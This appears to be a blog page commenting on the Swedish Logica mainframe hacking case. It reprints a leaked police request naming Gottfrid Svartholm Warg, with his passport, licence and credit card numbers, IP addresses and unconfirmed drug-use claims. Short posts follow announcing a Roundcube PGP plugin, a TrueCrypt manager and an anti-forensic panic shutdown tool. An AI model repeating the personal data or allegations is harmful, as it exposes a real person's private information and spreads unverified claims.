The question regarding whether Gottfrid did or did not attempt to transfer money to his bank account is highly irrelevant. What’s actually interesting in this case is that no matter if Gottfrid is guilty or innocent the Swedish government is right now standing bent over with their pants down saying somebody took control of their most critical systems and they didn’t even notice it for two years, despite somebody taking full copies of the data. These obviously existing security issues are not limited to Sweden. The customers of computer systems, both in the public and private sector, are all purchasing IBM products. IBM mainframes are ranked most secure in the world. Regardless of whether Gottfrid is guilty or innocent the fact remains: somebody has broken the systems on which shoulders all society critical elements stand: governments and banks.

The digitalization of our entire society has been proved to be broken, is the world ready to discuss that or do you want to continue debating the morals of stealing money on a bank mainframe? Open your eyes, the entire world just broke down and a lonesome bearded supposed drug addict is the alleged mastermind. In your face, Sweden.

Tor node gets raided

In June 2012 the Swedish International Public Prosecution Office requested legal aid from Germany to retrieve all data related to IP 217.13.197.5 after it had been discovered that it was used to connect to Logica mainframes. The Berlin police agency raided the address and the IP owned by Speedbone Internet & Connectivity. The server turned out to be a Tor exit node and no information could be retrieved about any users. No evidence was found during the raid and nothing was seized. The mainframe accessed stored big amounts of personal and financial data for the Swedish tax agency. Big amounts of data stored on systems used by the Prosecution Office and police authorities were also accessed and downloaded.

No evidence from Leaseweb

In September 2012 the Swedish International Public Prosecution Office requested legal aid from Germany to retrieve all data related to IP 46.165.196.182. The customer that rented the server could never be found since the service had been terminated a long time before the request arrived and Leaseweb did not keep customer data.

The info below is from the PDF linked in the top and not my personal words.

Detailed information of suspect (12 July 2012)

National Bureau of Investigation
Cyber Crime Unit
Richard Ahlgren

Family name: SVARTHOLM WARG
Forename: Per Gottfrid
Sex: Male
Date of birth: 17/10/1984
Nationality: Sweden

Passport
Passport number: 23810667
Date of issue: 28/01/2003
Place of issue: Stockholm, Sweden
Expiry date: 28/01/2013

Description (dated 26/05/2011)
Height: 175 cm
Eye colour: Blue
Skin colour: Fair skinned
Hair colour: Medium blonde

Links to Cambodia
In September 2011 the trials concerning The Pirate Bay started in the Svea Court of Appealing. Gottfrid Svartholm Warg was not present and it was told that he was in Phnom Penh, Cambodia. He posted a medical certificate, written in Khmer, to his attorney stating that he suffered from some kind of illness.

According to an article 2009 on the blog of the travel writer Adam Bray, Svartholm Warg had lived for a time in an apartment on top of the Cadillac Bar & Grill in Phnom Penh.

This article also said that Svartholm Warg was the owner of the company Estoy Ltd. Seychelles IBC in Phnom Penh. When he registered the company’s website he stated the phone number +855 929 607 72 (Cambodian number).

In chat logs from the IRC network Svartholm Warg posted in 2009 and 2010 that he was operating from Cambodia. For instance he wrote that he uses the border crossing at Poipet from Thailand to Cambodia.

Driving license
In the seizure from the current investigation a picture of Gottfrid Svartholm Warg’s Cambodian driving license was found. The picture is attached to this document.
Card code: A1.000034
Issue date: 21/01/2009
Address of Svartholm Warg: 4 St. 104 Wat Phnom, Daun Penh

IP information
In chat logs from the investigation Svartholm Warg has been logged on from IP-numbers pointing to Cambodia. These IP-numbers with timestamps are:

124.248.174.161 unknown time Cogetel Online
124.248.167.191 25/03.2012 2015 (UTC 0) Cogetel Online
124.248.187.150 10/03/2012 12:42 (UTC 0) Cogetel Online
124.248.187.22 04/03/2012 16:11 (UTC 0) Cogetel Online

Other IP-numbers pointing to Cambodia in the investigation are:

203.176.141.205 10/03/2012 01:00 (UTC 0) Mekongnet
27.109.118.33 10/03/2012 19:30 (UTC 0) DTV Starnet

Credit card number
A credit card number with the name Gottfrid Svartholm was found in the investigation.
Number: 4111 3418 0000 2947
Expiry date: 12/10
Name: Gottfrid Svartholm
Issuing bank: Acleda Bank PLC, Cambodia

Intelligence information
The information about Svartholm Warg that follows is to be seen as unconfirmed intelligence information:
– he is a drug addict and a frequent user of marijuana and crystal meth
– he is in very bad shape and may have spent time in hospital recently
– he has earlier or recent rented a house in Cambodia from an unknown American citizen
– he may have contact with one or more Swedish hacktivist in Cambodia
– he (and his network) may have access to at least one Internet Service Provider in Cambodia. That ISP is Cogetel.
– he (and his network) may have access to the mail account of the Mayor of Phnom Penh

Request for assistance

Cyber Crime Unit
Richard Ahlgren

Dear colleagues,

The Swedish National Bureau of Investigation is currently involved in a Cyber Crime investigation concerning a serious computer intrusion. In this investigation we request assistance from the Cambodian Police.

Preamble
The criminal offence being investigated is a very serious case of breach of data secrecy according to the Swedish Penal Code Chapter 4, Section 9c. The case is of Swedish national interest due to the very extensive character of the intrusion. The preliminary investigation is handled by several Swedish authorities such as the Swedish Prosecution Authority, the National Bureau of Investigation, the Stockholm Regional Investigation Unit and the Swedish Security Service.

Suspects
Two suspects have been detained during part of the preliminary investigation and we would appreciate your help with a third one. All suspects are Swedish citizens. The third suspect is:

Family name: SVARTHOLM WARG
Forename: Per Gottfrid
Date of birth: 17/10/1984
Sex: Male

Gottfrid Svartholm Warg is suspected for a breach of data secrecy together with others, on numerous occasions during the period January 1 2012 to April 15 2012. There has not yet been application for a detention order.

Svartholm Warg is international wanted (Interpol file number 2012/318024) in another case as a result of an imposed sentence of 1 year imprisonment in the Svea Court of Appeal 17/04/2009. The diffusion is attached.

His present location is unknown though we believe that he lives in Phnom Penh, Cambodia. See more detailed information in the attached files.

Case details
Intrusions have been made against, inter alia, a mainframe computer operated by a private company, hosting large amounts of personal data/census data from the Swedish Tax Agency, including protected personal data, as well as data of financial nature. Large amounts of data from the Enforcement Authority and the Police have been accessed as well.

The accessed data may cause considerable damage to authorities, companies and individuals.

The intruion handled by the on-going criminal is probably the most serious suffered by Swedish IT-systems linked to public authorities.

Requested assistance
Our request concerns investigative assistance locating the suspect Gottfrid Svartholm Warg. Furthermore we would like assistance with surveillance of the suspect with the purpose of documenting and analyzing his activities, contacts and locations.

In order to locate the suspect, see the attached document with detailed information. There you can find information about, inter alia, IP-addresses, credit card number, driving license and intelligence information. We have tried to collect and analyse information about his specific whereabouts but we cannot come any gfurther. We now need your assistance.

When the suspect has been located the intention of the prosecutor in this case, Senior Public Prosecutor Henrik Olin, is to file a Rogatory Request concerning a search warrant. In addition to the arrest of Svartholm Warg we would like to seize his computers, mobile phones, hard drives, other digital storage media and personal belongings that can be used as evidence in our case. If necessary and if possible Swedish police officers can assist in the house search.

HAND OVER RECORDS

Evidence number Description
1 Hard Drive Seagate 80 G
2 Hard Drive Hitachi 80 G
3 USB Stick
4 USB Stick
5 USB Stick
6 Memory Card
7 Wireless Access Point
8 Pärm
9 3G Dongle With Sim Card
10 Modem Zon
11 Sim Card Tele2
12 Plastic Cover belonging to a Switch
13 Paper With Addresses
14 Business Card
15 Paper From EuroBank
16 Bagage Tag
17 Receipt
18 IPhone
19 Nokia Phone
20 Invoice for MacBook
21 Note Book
22 Bankbook
23 Bankbook
24 Bankbook
25 Passport
26 MacBook
27 Plastic Cover belonging to a Router
28 Surveillance Camera, CCTV
29 16 Home Burned CDs
30 Lock Picking Tools
31 Modem Online
32 Key
33 Key

rc_openpgpjs: Ending seven years of Roundcube insecurity

Monday, January 7th, 2013

Roundcube is a popular open source IMAP webmail application. Roundcube is used by Harvard University, UC Berkeley and University of Michigan. Apple Mac OS X 10.7 uses Roundcube per default in its Mail Server. While writing this a lazy Google dork estimates 133 000 public Roundcube installations.

PGP support was first requested seven years ago and set critical six years ago. PGP support has been requested actively ever since. One of the core developers began the development of his PHP implementation, the Enigma plugin, two years ago but the plugin has not been made functional yet.

Today I am proud to release a beta version of my Roundcube plugin that implements PGP using the OpenPGP.js (based on GPG4Browsers) JavaScript library. rc_openpgpjs enables OpenPGP to function in the user’s browser so that fundamental key storage security isn’t immediately broken by design, in opposite to the official Enigma plugin.

At its current beta stage; rc_openpgpjs is able to generate an encryption key pair, save it in HTML5 web storage (in your own browser, guys) and perform encryption and decryption of email. rc_openpgpjs works in any modern browser that can parse HTML5 and supports the window.crypto object. Unfortunately this is limited to Google Chrome today, but Mozilla is struggling working on it.

rc_openpgpjs is available on Github. rc_openpgpjs will become stable as soon as some small glitches have been corrected. It has been written for Roundcube 0.8.4 with the Larry skin.

Introducing TrueCrypt Volume Manager

Saturday, January 5th, 2013

Linux has DM-CRYPT, FreeBSD has GEOM_ELI and Oracle is holding ZFS encryption options closed source. The incompatible nature of encrypted storage throughout various UNIX systems is an obvious problem. TrueCrypt supports most popular platforms but until now there hasn’t been a simple way to organize and maintain TrueCrypt containers over different types of systems. TrueCrypt Volume Manager aims to be this bridge.

TrueCrypt Volume Manager, shortened TCVM, is a UNIX shell environment written in Python. It provides a simple CLI shell interface to easily create, mount, unmount and list containers and also the possibility to easily change the passphrase of a given encryption container. Since TCVM is intended to run as a UNIX shell this allows you to securely administrate your TrueCrypt containers over the SSH protocol.

TCVM also provides the function to automatically generate secure passphrases for TrueCrypt containers and store the passphrases in a separate container. This function is fully optional to use and is essentially inspired by the KeePass project. TCVM flexes a custom wrapper for TrueCrypt.

Please note that TCVM is still new and may be slightly rough around the edges. I am happy to fix any issue you may encounter.

The project is available on Github.

Introducing panic_bcast

Thursday, December 13th, 2012

panic_bcast is a network protocol panic button operating decentralized through UDP broadcasts and HTTP. It’s intended to act a panic button in a sensitive network making it harder to perform cold boot attacks. A serious freedom fighter will run something like this on all nodes in the computerized network.

How it works

1. An activist has uninvited guests at the door
2. The activist sends the panic signal, a UDP broadcast, with panic_bcast
3. Other machines in the network pick up the panic signal
4. Once panic_bcast has picked up the panic signal it kills truecrypt and powers off the machine.

panic_bcast was written with the intention to support any form of UNIX that can run Python. It has been tested successfully on Linux and FreeBSD.

To trigger the panic signal over HTTP simply request http://…:8080/panic from a machine that is running panic_bcast. Whichever will do.

Please note that panic_bcast is a beta and more sophisticated ways to prevent cold boot attacks are planned. You can view these plans by searching for the word “TODO” in the source code.

The source code is available on Github.

Remember kids: there’s no home for swap in opsec.